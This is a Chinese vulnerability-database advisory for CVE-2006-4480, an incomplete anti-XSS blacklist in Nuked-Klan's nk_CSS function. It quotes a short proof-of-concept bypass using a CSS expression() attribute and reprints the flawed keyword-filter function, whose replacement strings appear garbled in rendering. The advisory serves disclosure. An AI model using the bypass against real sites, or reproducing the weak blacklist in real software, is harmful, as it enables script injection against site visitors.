Nuked-Klan 'nuked.php'nk_CSS函数 黑名单不完整漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193647 漏洞类型 未知
发布时间 2006-08-31 更新时间 2006-08-31
CVE编号 CVE-2006-4480 CNNVD-ID CNNVD-200608-536
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/83689
https://cxsecurity.com/issue/WLB-2006090006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-536
|漏洞详情
Nuked-Klan1.7SP4.3中nuked.php的nk_CSS函数存在黑名单不完整漏洞,远程攻击者借助向不包含在黑名单中的任一属性值内加入的JavaScript,来绕过防御跨站脚本攻击功能,并注入任意Web脚本或HTML。
|漏洞EXP
// *- BEGIN -*

// By Blwood
// http://blwood.net <http://blwood.net/>

We can bypassed the function anti-xss called  nk_CSS ( nuked.php) using 
like this :

<b id="blwood" style="width:expression(alert(' http://www.blwood.net')) 
<http://www.blwood.net%27%29%29/>"></b>

Here is the function :

function nk_CSS($str)

{
    if ($str != "")
    {
	$str = eregi_replace("content-disposition:","conten
;t-dispositio
n:",$str);

$str = eregi_replace("content-type:","content
-type:",$str);
	$str = eregi_replace("content-transfer-encoding:","conte
;nt-transfer-&#
101;ncoding:",$str);

$str = eregi_replace("include","include",$str
);
	$str = eregi_replace("<?","<?",$str);
	$str = eregi_replace("<?php","<?php",$str);

$str = eregi_replace("?>","?>",$str);
	$str = eregi_replace("script","script",$str);
	$str = eregi_replace("eval","eval",$str);

$str = eregi_replace("javascript","javascri
;pt",$str);
	$str = eregi_replace("embed","embed",$str);

$str = eregi_replace("iframe","iframe",$str);
        $str = eregi_replace("refresh", "refresh", $str);

$str = eregi_replace("onload", "onload", $str);
        $str = eregi_replace("onstart", "onstart", $str);

$str = eregi_replace("onerror", "onerror", $str);
        $str = eregi_replace("onabort", "onabort", $str);

$str = eregi_replace("onblur", "onblur", $str);
        $str = eregi_replace("onchange", "onchange", $str);

$str = eregi_replace("onclick", "onclick", $str);
        $str = eregi_replace("ondblclick", "ondblclick", $str);

$str = eregi_replace("onfocus", "onfocus", $str);
        $str = eregi_replace("onkeydown", "onkeydown", $str);

$str = eregi_replace("onkeypress", "onkeypress", $str);
        $str = eregi_replace("onkeyup", "onkeyup", $str);

$str = eregi_replace("onmousedown", "onmousedown", $str);
        $str = eregi_replace("onmousemove", "onmousemove", $str);

$str = eregi_replace("onmouseover", "onmouseover", $str);
        $str = eregi_replace("onmouseout", "onmouseout", $str);

$str = eregi_replace("onmouseup", "onmouseup", $str);
        $str = eregi_replace("onreset", "onreset", $str);

$str = eregi_replace("onselect", "onselect", $str);
        $str = eregi_replace("onsubmit", "onsubmit", $str);

$str = eregi_replace("onunload", "onunload", $str);
        $str = eregi_replace("document", "document", $str);

$str = eregi_replace("cookie", "cookie", $str);
        $str = eregi_replace("vbscript", "vbscript", $str);

$str = eregi_replace("location", "location", $str);
        $str = eregi_replace("object", "object", $str);

$str = eregi_replace("vbs", "vbs", $str);
        $str = eregi_replace("href", "href", $str);
        $str = eregi_replace("src", "src", $str);

} 
    return($str);
}

// *- END -*
|受影响的产品
Nuked-Klan Nuked-Klan 1.7 Sp4.3
|参考资料

来源:BUGTRAQ
名称:20060830NukedKlan1.7SP4.3:FunctionAnti-XSSBypassed
链接:http://www.securityfocus.com/archive/1/archive/1/444749/100/0/threaded
来源:SREASON
名称:1478
链接:http://securityreason.com/securityalert/1478